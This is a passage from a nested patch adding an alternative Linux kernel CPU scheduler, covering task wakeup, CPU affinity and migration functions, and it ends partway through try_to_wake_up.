++ * wait_task_inactive - wait for a thread to unschedule.
++ *
++ * Wait for the thread to block in any of the states set in @match_state.
++ * If it changes, i.e. @p might have woken up, then return zero.  When we
++ * succeed in waiting for @p to be off its CPU, we return a positive number
++ * (its total switch count).  If a second call a short while later returns the
++ * same number, the caller can be sure that @p has remained unscheduled the
++ * whole time.
++ *
++ * The caller must ensure that the task *will* unschedule sometime soon,
++ * else this function might spin for a *long* time. This function can't
++ * be called with interrupts off, or it may introduce deadlock with
++ * smp_call_function() if an IPI is sent by the same process we are
++ * waiting to become inactive.
++ */
++unsigned long wait_task_inactive(struct task_struct *p, unsigned int match_state)
++{
++	unsigned long flags;
++	bool running, on_rq;
++	unsigned long ncsw;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	for (;;) {
++		rq = task_rq(p);
++
++		/*
++		 * If the task is actively running on another CPU
++		 * still, just relax and busy-wait without holding
++		 * any locks.
++		 *
++		 * NOTE! Since we don't hold any locks, it's not
++		 * even sure that "rq" stays as the right runqueue!
++		 * But we don't care, since this will return false
++		 * if the runqueue has changed and p is actually now
++		 * running somewhere else!
++		 */
++		while (task_on_cpu(p) && p == rq->curr) {
++			if (!(READ_ONCE(p->__state) & match_state))
++				return 0;
++			cpu_relax();
++		}
++
++		/*
++		 * Ok, time to look more closely! We need the rq
++		 * lock now, to be *sure*. If we're wrong, we'll
++		 * just go back and repeat.
++		 */
++		task_access_lock_irqsave(p, &lock, &flags);
++		trace_sched_wait_task(p);
++		running = task_on_cpu(p);
++		on_rq = p->on_rq;
++		ncsw = 0;
++		if (READ_ONCE(p->__state) & match_state)
++			ncsw = p->nvcsw | LONG_MIN; /* sets MSB */
++		task_access_unlock_irqrestore(p, lock, &flags);
++
++		/*
++		 * If it changed from the expected state, bail out now.
++		 */
++		if (unlikely(!ncsw))
++			break;
++
++		/*
++		 * Was it really running after all now that we
++		 * checked with the proper locks actually held?
++		 *
++		 * Oops. Go back and try again..
++		 */
++		if (unlikely(running)) {
++			cpu_relax();
++			continue;
++		}
++
++		/*
++		 * It's not enough that it's not actively running,
++		 * it must be off the runqueue _entirely_, and not
++		 * preempted!
++		 *
++		 * So if it was still runnable (but just not actively
++		 * running right now), it's preempted, and we should
++		 * yield - it could be a while.
++		 */
++		if (unlikely(on_rq)) {
++			ktime_t to = NSEC_PER_SEC / HZ;
++
++			set_current_state(TASK_UNINTERRUPTIBLE);
++			schedule_hrtimeout(&to, HRTIMER_MODE_REL_HARD);
++			continue;
++		}
++
++		/*
++		 * Ahh, all good. It wasn't running, and it wasn't
++		 * runnable, which means that it will never become
++		 * running in the future either. We're all done!
++		 */
++		break;
++	}
++
++	return ncsw;
++}
++
++/***
++ * kick_process - kick a running thread to enter/exit the kernel
++ * @p: the to-be-kicked thread
++ *
++ * Cause a process which is running on another CPU to enter
++ * kernel-mode, without any delay. (to get signals handled.)
++ *
++ * NOTE: this function doesn't have to take the runqueue lock,
++ * because all it wants to ensure is that the remote task enters
++ * the kernel. If the IPI races and the task has been migrated
++ * to another CPU then no harm is done and the purpose has been
++ * achieved as well.
++ */
++void kick_process(struct task_struct *p)
++{
++	int cpu;
++
++	preempt_disable();
++	cpu = task_cpu(p);
++	if ((cpu != smp_processor_id()) && task_curr(p))
++		smp_send_reschedule(cpu);
++	preempt_enable();
++}
++EXPORT_SYMBOL_GPL(kick_process);
++
++/*
++ * ->cpus_ptr is protected by both rq->lock and p->pi_lock
++ *
++ * A few notes on cpu_active vs cpu_online:
++ *
++ *  - cpu_active must be a subset of cpu_online
++ *
++ *  - on CPU-up we allow per-CPU kthreads on the online && !active CPU,
++ *    see __set_cpus_allowed_ptr(). At this point the newly online
++ *    CPU isn't yet part of the sched domains, and balancing will not
++ *    see it.
++ *
++ *  - on cpu-down we clear cpu_active() to mask the sched domains and
++ *    avoid the load balancer to place new tasks on the to be removed
++ *    CPU. Existing tasks will remain running there and will be taken
++ *    off.
++ *
++ * This means that fallback selection must not select !active CPUs.
++ * And can assume that any active CPU must be online. Conversely
++ * select_task_rq() below may allow selection of !active CPUs in order
++ * to satisfy the above rules.
++ */
++static int select_fallback_rq(int cpu, struct task_struct *p)
++{
++	int nid = cpu_to_node(cpu);
++	const struct cpumask *nodemask = NULL;
++	enum { cpuset, possible, fail } state = cpuset;
++	int dest_cpu;
++
++	/*
++	 * If the node that the CPU is on has been offlined, cpu_to_node()
++	 * will return -1. There is no CPU on the node, and we should
++	 * select the CPU on the other node.
++	 */
++	if (nid != -1) {
++		nodemask = cpumask_of_node(nid);
++
++		/* Look for allowed, online CPU in same node. */
++		for_each_cpu(dest_cpu, nodemask) {
++			if (is_cpu_allowed(p, dest_cpu))
++				return dest_cpu;
++		}
++	}
++
++	for (;;) {
++		/* Any allowed, online CPU? */
++		for_each_cpu(dest_cpu, p->cpus_ptr) {
++			if (!is_cpu_allowed(p, dest_cpu))
++				continue;
++			goto out;
++		}
++
++		/* No more Mr. Nice Guy. */
++		switch (state) {
++		case cpuset:
++			if (cpuset_cpus_allowed_fallback(p)) {
++				state = possible;
++				break;
++			}
++			fallthrough;
++		case possible:
++			/*
++			 * XXX When called from select_task_rq() we only
++			 * hold p->pi_lock and again violate locking order.
++			 *
++			 * More yuck to audit.
++			 */
++			do_set_cpus_allowed(p, task_cpu_possible_mask(p));
++			state = fail;
++			break;
++
++		case fail:
++			BUG();
++			break;
++		}
++	}
++
++out:
++	if (state != cpuset) {
++		/*
++		 * Don't tell them about moving exiting tasks or
++		 * kernel threads (both mm NULL), since they never
++		 * leave kernel.
++		 */
++		if (p->mm && printk_ratelimit()) {
++			printk_deferred("process %d (%s) no longer affine to cpu%d\n",
++					task_pid_nr(p), p->comm, cpu);
++		}
++	}
++
++	return dest_cpu;
++}
++
++static inline void
++sched_preempt_mask_flush(cpumask_t *mask, int prio)
++{
++	int cpu;
++
++	cpumask_copy(mask, sched_idle_mask);
++
++	for_each_cpu_not(cpu, mask) {
++		if (prio < cpu_rq(cpu)->prio)
++			cpumask_set_cpu(cpu, mask);
++	}
++}
++
++static inline int
++preempt_mask_check(struct task_struct *p, cpumask_t *allow_mask, cpumask_t *preempt_mask)
++{
++	int task_prio = task_sched_prio(p);
++	cpumask_t *mask = sched_preempt_mask + SCHED_QUEUE_BITS - 1 - task_prio;
++	int pr = atomic_read(&sched_prio_record);
++
++	if (pr != task_prio) {
++		sched_preempt_mask_flush(mask, task_prio);
++		atomic_set(&sched_prio_record, task_prio);
++	}
++
++	return cpumask_and(preempt_mask, allow_mask, mask);
++}
++
++static inline int select_task_rq(struct task_struct *p)
++{
++	cpumask_t allow_mask, mask;
++
++	if (unlikely(!cpumask_and(&allow_mask, p->cpus_ptr, cpu_active_mask)))
++		return select_fallback_rq(task_cpu(p), p);
++
++	if (
++#ifdef CONFIG_SCHED_SMT
++	    cpumask_and(&mask, &allow_mask, &sched_sg_idle_mask) ||
++#endif
++	    cpumask_and(&mask, &allow_mask, sched_idle_mask) ||
++	    preempt_mask_check(p, &allow_mask, &mask))
++		return best_mask_cpu(task_cpu(p), &mask);
++
++	return best_mask_cpu(task_cpu(p), &allow_mask);
++}
++
++void sched_set_stop_task(int cpu, struct task_struct *stop)
++{
++	static struct lock_class_key stop_pi_lock;
++	struct sched_param stop_param = { .sched_priority = STOP_PRIO };
++	struct sched_param start_param = { .sched_priority = 0 };
++	struct task_struct *old_stop = cpu_rq(cpu)->stop;
++
++	if (stop) {
++		/*
++		 * Make it appear like a SCHED_FIFO task, its something
++		 * userspace knows about and won't get confused about.
++		 *
++		 * Also, it will make PI more or less work without too
++		 * much confusion -- but then, stop work should not
++		 * rely on PI working anyway.
++		 */
++		sched_setscheduler_nocheck(stop, SCHED_FIFO, &stop_param);
++
++		/*
++		 * The PI code calls rt_mutex_setprio() with ->pi_lock held to
++		 * adjust the effective priority of a task. As a result,
++		 * rt_mutex_setprio() can trigger (RT) balancing operations,
++		 * which can then trigger wakeups of the stop thread to push
++		 * around the current task.
++		 *
++		 * The stop task itself will never be part of the PI-chain, it
++		 * never blocks, therefore that ->pi_lock recursion is safe.
++		 * Tell lockdep about this by placing the stop->pi_lock in its
++		 * own class.
++		 */
++		lockdep_set_class(&stop->pi_lock, &stop_pi_lock);
++	}
++
++	cpu_rq(cpu)->stop = stop;
++
++	if (old_stop) {
++		/*
++		 * Reset it back to a normal scheduling policy so that
++		 * it can die in pieces.
++		 */
++		sched_setscheduler_nocheck(old_stop, SCHED_NORMAL, &start_param);
++	}
++}
++
++static int affine_move_task(struct rq *rq, struct task_struct *p, int dest_cpu,
++			    raw_spinlock_t *lock, unsigned long irq_flags)
++	__releases(rq->lock)
++	__releases(p->pi_lock)
++{
++	/* Can the task run on the task's current CPU? If so, we're done */
++	if (!cpumask_test_cpu(task_cpu(p), &p->cpus_mask)) {
++		if (p->migration_disabled) {
++			if (likely(p->cpus_ptr != &p->cpus_mask))
++				__do_set_cpus_ptr(p, &p->cpus_mask);
++			p->migration_disabled = 0;
++			p->migration_flags |= MDF_FORCE_ENABLED;
++			/* When p is migrate_disabled, rq->lock should be held */
++			rq->nr_pinned--;
++		}
++
++		if (task_on_cpu(p) || READ_ONCE(p->__state) == TASK_WAKING) {
++			struct migration_arg arg = { p, dest_cpu };
++
++			/* Need help from migration thread: drop lock and wait. */
++			__task_access_unlock(p, lock);
++			raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++			stop_one_cpu(cpu_of(rq), migration_cpu_stop, &arg);
++			return 0;
++		}
++		if (task_on_rq_queued(p)) {
++			/*
++			 * OK, since we're going to drop the lock immediately
++			 * afterwards anyway.
++			 */
++			update_rq_clock(rq);
++			rq = move_queued_task(rq, p, dest_cpu);
++			lock = &rq->lock;
++		}
++	}
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++	return 0;
++}
++
++static int __set_cpus_allowed_ptr_locked(struct task_struct *p,
++					 struct affinity_context *ctx,
++					 struct rq *rq,
++					 raw_spinlock_t *lock,
++					 unsigned long irq_flags)
++{
++	const struct cpumask *cpu_allowed_mask = task_cpu_possible_mask(p);
++	const struct cpumask *cpu_valid_mask = cpu_active_mask;
++	bool kthread = p->flags & PF_KTHREAD;
++	int dest_cpu;
++	int ret = 0;
++
++	if (kthread || is_migration_disabled(p)) {
++		/*
++		 * Kernel threads are allowed on online && !active CPUs,
++		 * however, during cpu-hot-unplug, even these might get pushed
++		 * away if not KTHREAD_IS_PER_CPU.
++		 *
++		 * Specifically, migration_disabled() tasks must not fail the
++		 * cpumask_any_and_distribute() pick below, esp. so on
++		 * SCA_MIGRATE_ENABLE, otherwise we'll not call
++		 * set_cpus_allowed_common() and actually reset p->cpus_ptr.
++		 */
++		cpu_valid_mask = cpu_online_mask;
++	}
++
++	if (!kthread && !cpumask_subset(ctx->new_mask, cpu_allowed_mask)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	/*
++	 * Must re-check here, to close a race against __kthread_bind(),
++	 * sched_setaffinity() is not guaranteed to observe the flag.
++	 */
++	if ((ctx->flags & SCA_CHECK) && (p->flags & PF_NO_SETAFFINITY)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	if (cpumask_equal(&p->cpus_mask, ctx->new_mask))
++		goto out;
++
++	dest_cpu = cpumask_any_and(cpu_valid_mask, ctx->new_mask);
++	if (dest_cpu >= nr_cpu_ids) {
++		ret = -EINVAL;
++		goto out;
++	}
++
++	__do_set_cpus_allowed(p, ctx);
++
++	return affine_move_task(rq, p, dest_cpu, lock, irq_flags);
++
++out:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++
++	return ret;
++}
++
++/*
++ * Change a given task's CPU affinity. Migrate the thread to a
++ * is removed from the allowed bitmask.
++ *
++ * NOTE: the caller must have a valid reference to the task, the
++ * task must not exit() & deallocate itself prematurely. The
++ * call is not atomic; no spinlocks may be held.
++ */
++static int __set_cpus_allowed_ptr(struct task_struct *p,
++				  struct affinity_context *ctx)
++{
++	unsigned long irq_flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
++	rq = __task_access_lock(p, &lock);
++	/*
++	 * Masking should be skipped if SCA_USER or any of the SCA_MIGRATE_*
++	 * flags are set.
++	 */
++	if (p->user_cpus_ptr &&
++	    !(ctx->flags & SCA_USER) &&
++	    cpumask_and(rq->scratch_mask, ctx->new_mask, p->user_cpus_ptr))
++		ctx->new_mask = rq->scratch_mask;
++
++
++	return __set_cpus_allowed_ptr_locked(p, ctx, rq, lock, irq_flags);
++}
++
++int set_cpus_allowed_ptr(struct task_struct *p, const struct cpumask *new_mask)
++{
++	struct affinity_context ac = {
++		.new_mask  = new_mask,
++		.flags     = 0,
++	};
++
++	return __set_cpus_allowed_ptr(p, &ac);
++}
++EXPORT_SYMBOL_GPL(set_cpus_allowed_ptr);
++
++/*
++ * Change a given task's CPU affinity to the intersection of its current
++ * affinity mask and @subset_mask, writing the resulting mask to @new_mask.
++ * If user_cpus_ptr is defined, use it as the basis for restricting CPU
++ * affinity or use cpu_online_mask instead.
++ *
++ * If the resulting mask is empty, leave the affinity unchanged and return
++ * -EINVAL.
++ */
++static int restrict_cpus_allowed_ptr(struct task_struct *p,
++				     struct cpumask *new_mask,
++				     const struct cpumask *subset_mask)
++{
++	struct affinity_context ac = {
++		.new_mask  = new_mask,
++		.flags     = 0,
++	};
++	unsigned long irq_flags;
++	raw_spinlock_t *lock;
++	struct rq *rq;
++	int err;
++
++	raw_spin_lock_irqsave(&p->pi_lock, irq_flags);
++	rq = __task_access_lock(p, &lock);
++
++	if (!cpumask_and(new_mask, task_user_cpus(p), subset_mask)) {
++		err = -EINVAL;
++		goto err_unlock;
++	}
++
++	return __set_cpus_allowed_ptr_locked(p, &ac, rq, lock, irq_flags);
++
++err_unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, irq_flags);
++	return err;
++}
++
++/*
++ * Restrict the CPU affinity of task @p so that it is a subset of
++ * task_cpu_possible_mask() and point @p->user_cpus_ptr to a copy of the
++ * old affinity mask. If the resulting mask is empty, we warn and walk
++ * up the cpuset hierarchy until we find a suitable mask.
++ */
++void force_compatible_cpus_allowed_ptr(struct task_struct *p)
++{
++	cpumask_var_t new_mask;
++	const struct cpumask *override_mask = task_cpu_possible_mask(p);
++
++	alloc_cpumask_var(&new_mask, GFP_KERNEL);
++
++	/*
++	 * __migrate_task() can fail silently in the face of concurrent
++	 * offlining of the chosen destination CPU, so take the hotplug
++	 * lock to ensure that the migration succeeds.
++	 */
++	cpus_read_lock();
++	if (!cpumask_available(new_mask))
++		goto out_set_mask;
++
++	if (!restrict_cpus_allowed_ptr(p, new_mask, override_mask))
++		goto out_free_mask;
++
++	/*
++	 * We failed to find a valid subset of the affinity mask for the
++	 * task, so override it based on its cpuset hierarchy.
++	 */
++	cpuset_cpus_allowed(p, new_mask);
++	override_mask = new_mask;
++
++out_set_mask:
++	if (printk_ratelimit()) {
++		printk_deferred("Overriding affinity for process %d (%s) to CPUs %*pbl\n",
++				task_pid_nr(p), p->comm,
++				cpumask_pr_args(override_mask));
++	}
++
++	WARN_ON(set_cpus_allowed_ptr(p, override_mask));
++out_free_mask:
++	cpus_read_unlock();
++	free_cpumask_var(new_mask);
++}
++
++static int
++__sched_setaffinity(struct task_struct *p, struct affinity_context *ctx);
++
++/*
++ * Restore the affinity of a task @p which was previously restricted by a
++ * call to force_compatible_cpus_allowed_ptr().
++ *
++ * It is the caller's responsibility to serialise this with any calls to
++ * force_compatible_cpus_allowed_ptr(@p).
++ */
++void relax_compatible_cpus_allowed_ptr(struct task_struct *p)
++{
++	struct affinity_context ac = {
++		.new_mask  = task_user_cpus(p),
++		.flags     = 0,
++	};
++	int ret;
++
++	/*
++	 * Try to restore the old affinity mask with __sched_setaffinity().
++	 * Cpuset masking will be done there too.
++	 */
++	ret = __sched_setaffinity(p, &ac);
++	WARN_ON_ONCE(ret);
++}
++
++#else /* CONFIG_SMP */
++
++static inline int select_task_rq(struct task_struct *p)
++{
++	return 0;
++}
++
++static inline int
++__set_cpus_allowed_ptr(struct task_struct *p,
++		       struct affinity_context *ctx)
++{
++	return set_cpus_allowed_ptr(p, ctx->new_mask);
++}
++
++static inline bool rq_has_pinned_tasks(struct rq *rq)
++{
++	return false;
++}
++
++static inline cpumask_t *alloc_user_cpus_ptr(int node)
++{
++	return NULL;
++}
++
++#endif /* !CONFIG_SMP */
++
++static void
++ttwu_stat(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq;
++
++	if (!schedstat_enabled())
++		return;
++
++	rq = this_rq();
++
++#ifdef CONFIG_SMP
++	if (cpu == rq->cpu) {
++		__schedstat_inc(rq->ttwu_local);
++		__schedstat_inc(p->stats.nr_wakeups_local);
++	} else {
++		/** Alt schedule FW ToDo:
++		 * How to do ttwu_wake_remote
++		 */
++	}
++#endif /* CONFIG_SMP */
++
++	__schedstat_inc(rq->ttwu_count);
++	__schedstat_inc(p->stats.nr_wakeups);
++}
++
++/*
++ * Mark the task runnable and perform wakeup-preemption.
++ */
++static inline void
++ttwu_do_wakeup(struct rq *rq, struct task_struct *p, int wake_flags)
++{
++	check_preempt_curr(rq);
++	WRITE_ONCE(p->__state, TASK_RUNNING);
++	trace_sched_wakeup(p);
++}
++
++static inline void
++ttwu_do_activate(struct rq *rq, struct task_struct *p, int wake_flags)
++{
++	if (p->sched_contributes_to_load)
++		rq->nr_uninterruptible--;
++
++	if (
++#ifdef CONFIG_SMP
++	    !(wake_flags & WF_MIGRATED) &&
++#endif
++	    p->in_iowait) {
++		delayacct_blkio_end(p);
++		atomic_dec(&task_rq(p)->nr_iowait);
++	}
++
++	activate_task(p, rq);
++	ttwu_do_wakeup(rq, p, 0);
++}
++
++/*
++ * Consider @p being inside a wait loop:
++ *
++ *   for (;;) {
++ *      set_current_state(TASK_UNINTERRUPTIBLE);
++ *
++ *      if (CONDITION)
++ *         break;
++ *
++ *      schedule();
++ *   }
++ *   __set_current_state(TASK_RUNNING);
++ *
++ * between set_current_state() and schedule(). In this case @p is still
++ * runnable, so all that needs doing is change p->state back to TASK_RUNNING in
++ * an atomic manner.
++ *
++ * By taking task_rq(p)->lock we serialize against schedule(), if @p->on_rq
++ * then schedule() must still happen and p->state can be changed to
++ * TASK_RUNNING. Otherwise we lost the race, schedule() has happened, and we
++ * need to do a full wakeup with enqueue.
++ *
++ * Returns: %true when the wakeup is done,
++ *          %false otherwise.
++ */
++static int ttwu_runnable(struct task_struct *p, int wake_flags)
++{
++	struct rq *rq;
++	raw_spinlock_t *lock;
++	int ret = 0;
++
++	rq = __task_access_lock(p, &lock);
++	if (task_on_rq_queued(p)) {
++		/* check_preempt_curr() may use rq clock */
++		update_rq_clock(rq);
++		ttwu_do_wakeup(rq, p, wake_flags);
++		ret = 1;
++	}
++	__task_access_unlock(p, lock);
++
++	return ret;
++}
++
++#ifdef CONFIG_SMP
++void sched_ttwu_pending(void *arg)
++{
++	struct llist_node *llist = arg;
++	struct rq *rq = this_rq();
++	struct task_struct *p, *t;
++	struct rq_flags rf;
++
++	if (!llist)
++		return;
++
++	rq_lock_irqsave(rq, &rf);
++	update_rq_clock(rq);
++
++	llist_for_each_entry_safe(p, t, llist, wake_entry.llist) {
++		if (WARN_ON_ONCE(p->on_cpu))
++			smp_cond_load_acquire(&p->on_cpu, !VAL);
++
++		if (WARN_ON_ONCE(task_cpu(p) != cpu_of(rq)))
++			set_task_cpu(p, cpu_of(rq));
++
++		ttwu_do_activate(rq, p, p->sched_remote_wakeup ? WF_MIGRATED : 0);
++	}
++
++	/*
++	 * Must be after enqueueing at least once task such that
++	 * idle_cpu() does not observe a false-negative -- if it does,
++	 * it is possible for select_idle_siblings() to stack a number
++	 * of tasks on this CPU during that window.
++	 *
++	 * It is ok to clear ttwu_pending when another task pending.
++	 * We will receive IPI after local irq enabled and then enqueue it.
++	 * Since now nr_running > 0, idle_cpu() will always get correct result.
++	 */
++	WRITE_ONCE(rq->ttwu_pending, 0);
++	rq_unlock_irqrestore(rq, &rf);
++}
++
++void send_call_function_single_ipi(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (!set_nr_if_polling(rq->idle))
++		arch_send_call_function_single_ipi(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++/*
++ * Queue a task on the target CPUs wake_list and wake the CPU via IPI if
++ * necessary. The wakee CPU on receipt of the IPI will queue the task
++ * via sched_ttwu_wakeup() for activation so the wakee incurs the cost
++ * of the wakeup instead of the waker.
++ */
++static void __ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	p->sched_remote_wakeup = !!(wake_flags & WF_MIGRATED);
++
++	WRITE_ONCE(rq->ttwu_pending, 1);
++	__smp_call_single_queue(cpu, &p->wake_entry.llist);
++}
++
++static inline bool ttwu_queue_cond(struct task_struct *p, int cpu)
++{
++	/*
++	 * Do not complicate things with the async wake_list while the CPU is
++	 * in hotplug state.
++	 */
++	if (!cpu_active(cpu))
++		return false;
++
++	/* Ensure the task will still be allowed to run on the CPU. */
++	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
++		return false;
++
++	/*
++	 * If the CPU does not share cache, then queue the task on the
++	 * remote rqs wakelist to avoid accessing remote data.
++	 */
++	if (!cpus_share_cache(smp_processor_id(), cpu))
++		return true;
++
++	if (cpu == smp_processor_id())
++		return false;
++
++	/*
++	 * If the wakee cpu is idle, or the task is descheduling and the
++	 * only running task on the CPU, then use the wakelist to offload
++	 * the task activation to the idle (or soon-to-be-idle) CPU as
++	 * the current CPU is likely busy. nr_running is checked to
++	 * avoid unnecessary task stacking.
++	 *
++	 * Note that we can only get here with (wakee) p->on_rq=0,
++	 * p->on_cpu can be whatever, we've done the dequeue, so
++	 * the wakee has been accounted out of ->nr_running.
++	 */
++	if (!cpu_rq(cpu)->nr_running)
++		return true;
++
++	return false;
++}
++
++static bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	if (__is_defined(ALT_SCHED_TTWU_QUEUE) && ttwu_queue_cond(p, cpu)) {
++		sched_clock_cpu(cpu); /* Sync clocks across CPUs */
++		__ttwu_queue_wakelist(p, cpu, wake_flags);
++		return true;
++	}
++
++	return false;
++}
++
++void wake_up_if_idle(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	rcu_read_lock();
++
++	if (!is_idle_task(rcu_dereference(rq->curr)))
++		goto out;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (is_idle_task(rq->curr))
++		resched_curr(rq);
++	/* Else CPU is not idle, do nothing here */
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++out:
++	rcu_read_unlock();
++}
++
++bool cpus_share_cache(int this_cpu, int that_cpu)
++{
++	if (this_cpu == that_cpu)
++		return true;
++
++	return per_cpu(sd_llc_id, this_cpu) == per_cpu(sd_llc_id, that_cpu);
++}
++#else /* !CONFIG_SMP */
++
++static inline bool ttwu_queue_wakelist(struct task_struct *p, int cpu, int wake_flags)
++{
++	return false;
++}
++
++#endif /* CONFIG_SMP */
++
++static inline void ttwu_queue(struct task_struct *p, int cpu, int wake_flags)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	if (ttwu_queue_wakelist(p, cpu, wake_flags))
++		return;
++
++	raw_spin_lock(&rq->lock);
++	update_rq_clock(rq);
++	ttwu_do_activate(rq, p, wake_flags);
++	raw_spin_unlock(&rq->lock);
++}
++
++/*
++ * Invoked from try_to_wake_up() to check whether the task can be woken up.
++ *
++ * The caller holds p::pi_lock if p != current or has preemption
++ * disabled when p == current.
++ *
++ * The rules of PREEMPT_RT saved_state:
++ *
++ *   The related locking code always holds p::pi_lock when updating
++ *   p::saved_state, which means the code is fully serialized in both cases.
++ *
++ *   The lock wait and lock wakeups happen via TASK_RTLOCK_WAIT. No other
++ *   bits set. This allows to distinguish all wakeup scenarios.
++ */
++static __always_inline
++bool ttwu_state_match(struct task_struct *p, unsigned int state, int *success)
++{
++	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)) {
++		WARN_ON_ONCE((state & TASK_RTLOCK_WAIT) &&
++			     state != TASK_RTLOCK_WAIT);
++	}
++
++	if (READ_ONCE(p->__state) & state) {
++		*success = 1;
++		return true;
++	}
++
++#ifdef CONFIG_PREEMPT_RT
++	/*
++	 * Saved state preserves the task state across blocking on
++	 * an RT lock.  If the state matches, set p::saved_state to
++	 * TASK_RUNNING, but do not wake the task because it waits
++	 * for a lock wakeup. Also indicate success because from
++	 * the regular waker's point of view this has succeeded.
++	 *
++	 * After acquiring the lock the task will restore p::__state
++	 * from p::saved_state which ensures that the regular
++	 * wakeup is not lost. The restore will also set
++	 * p::saved_state to TASK_RUNNING so any further tests will
++	 * not result in false positives vs. @success
++	 */
++	if (p->saved_state & state) {
++		p->saved_state = TASK_RUNNING;
++		*success = 1;
++	}
++#endif
++	return false;
++}
++
++/*
++ * Notes on Program-Order guarantees on SMP systems.
++ *
++ *  MIGRATION
++ *
++ * The basic program-order guarantee on SMP systems is that when a task [t]
++ * migrates, all its activity on its old CPU [c0] happens-before any subsequent
++ * execution on its new CPU [c1].
++ *
++ * For migration (of runnable tasks) this is provided by the following means:
++ *
++ *  A) UNLOCK of the rq(c0)->lock scheduling out task t
++ *  B) migration for t is required to synchronize *both* rq(c0)->lock and
++ *     rq(c1)->lock (if not at the same time, then in that order).
++ *  C) LOCK of the rq(c1)->lock scheduling in task
++ *
++ * Transitivity guarantees that B happens after A and C after B.
++ * Note: we only require RCpc transitivity.
++ * Note: the CPU doing B need not be c0 or c1
++ *
++ * Example:
++ *
++ *   CPU0            CPU1            CPU2
++ *
++ *   LOCK rq(0)->lock
++ *   sched-out X
++ *   sched-in Y
++ *   UNLOCK rq(0)->lock
++ *
++ *                                   LOCK rq(0)->lock // orders against CPU0
++ *                                   dequeue X
++ *                                   UNLOCK rq(0)->lock
++ *
++ *                                   LOCK rq(1)->lock
++ *                                   enqueue X
++ *                                   UNLOCK rq(1)->lock
++ *
++ *                   LOCK rq(1)->lock // orders against CPU2
++ *                   sched-out Z
++ *                   sched-in X
++ *                   UNLOCK rq(1)->lock
++ *
++ *
++ *  BLOCKING -- aka. SLEEP + WAKEUP
++ *
++ * For blocking we (obviously) need to provide the same guarantee as for
++ * migration. However the means are completely different as there is no lock
++ * chain to provide order. Instead we do:
++ *
++ *   1) smp_store_release(X->on_cpu, 0)   -- finish_task()
++ *   2) smp_cond_load_acquire(!X->on_cpu) -- try_to_wake_up()
++ *
++ * Example:
++ *
++ *   CPU0 (schedule)  CPU1 (try_to_wake_up) CPU2 (schedule)
++ *
++ *   LOCK rq(0)->lock LOCK X->pi_lock
++ *   dequeue X
++ *   sched-out X
++ *   smp_store_release(X->on_cpu, 0);
++ *
++ *                    smp_cond_load_acquire(&X->on_cpu, !VAL);
++ *                    X->state = WAKING
++ *                    set_task_cpu(X,2)
++ *
++ *                    LOCK rq(2)->lock
++ *                    enqueue X
++ *                    X->state = RUNNING
++ *                    UNLOCK rq(2)->lock
++ *
++ *                                          LOCK rq(2)->lock // orders against CPU1
++ *                                          sched-out Z
++ *                                          sched-in X
++ *                                          UNLOCK rq(2)->lock
++ *
++ *                    UNLOCK X->pi_lock
++ *   UNLOCK rq(0)->lock
++ *
++ *
++ * However; for wakeups there is a second guarantee we must provide, namely we
++ * must observe the state that lead to our wakeup. That is, not only must our
++ * task observe its own prior state, it must also observe the stores prior to
++ * its wakeup.
++ *
++ * This means that any means of doing remote wakeups must order the CPU doing
++ * the wakeup against the CPU the task is going to end up running on. This,
++ * however, is already required for the regular Program-Order guarantee above,
++ * since the waking CPU is the one issueing the ACQUIRE (smp_cond_load_acquire).
++ *
++ */
++
++/**
++ * try_to_wake_up - wake up a thread
++ * @p: the thread to be awakened
++ * @state: the mask of task states that can be woken
++ * @wake_flags: wake modifier flags (WF_*)
++ *
++ * Conceptually does:
++ *
++ *   If (@state & @p->state) @p->state = TASK_RUNNING.
++ *
++ * If the task was not queued/runnable, also place it back on a runqueue.
++ *
++ * This function is atomic against schedule() which would dequeue the task.
++ *
++ * It issues a full memory barrier before accessing @p->state, see the comment
++ * with set_current_state().
++ *
++ * Uses p->pi_lock to serialize against concurrent wake-ups.
++ *
++ * Relies on p->pi_lock stabilizing:
++ *  - p->sched_class
++ *  - p->cpus_ptr
++ *  - p->sched_task_group
++ * in order to do migration, see its use of select_task_rq()/set_task_cpu().
++ *
++ * Tries really hard to only take one task_rq(p)->lock for performance.
++ * Takes rq->lock in:
++ *  - ttwu_runnable()    -- old rq, unavoidable, see comment there;
++ *  - ttwu_queue()       -- new rq, for enqueue of the task;
++ *  - psi_ttwu_dequeue() -- much sadness :-( accounting will kill us.
++ *
++ * As a consequence we race really badly with just about everything. See the
++ * many memory barriers and their comments for details.
++ *
++ * Return: %true if @p->state changes (an actual wakeup was done),
++ *	   %false otherwise.
++ */
++static int try_to_wake_up(struct task_struct *p, unsigned int state,
++			  int wake_flags)
++{
++	unsigned long flags;
++	int cpu, success = 0;
++
++	preempt_disable();
++	if (p == current) {
++		/*
++		 * We're waking current, this means 'p->on_rq' and 'task_cpu(p)
++		 * == smp_processor_id()'. Together this means we can special
++		 * case the whole 'p->on_rq && ttwu_runnable()' case below
++		 * without taking any locks.
++		 *
++		 * In particular:
++		 *  - we rely on Program-Order guarantees for all the ordering,
++		 *  - we're serialized against set_special_state() by virtue of
++		 *    it disabling IRQs (this allows not taking ->pi_lock).
++		 */
++		if (!ttwu_state_match(p, state, &success))
++			goto out;
++
++		trace_sched_waking(p);
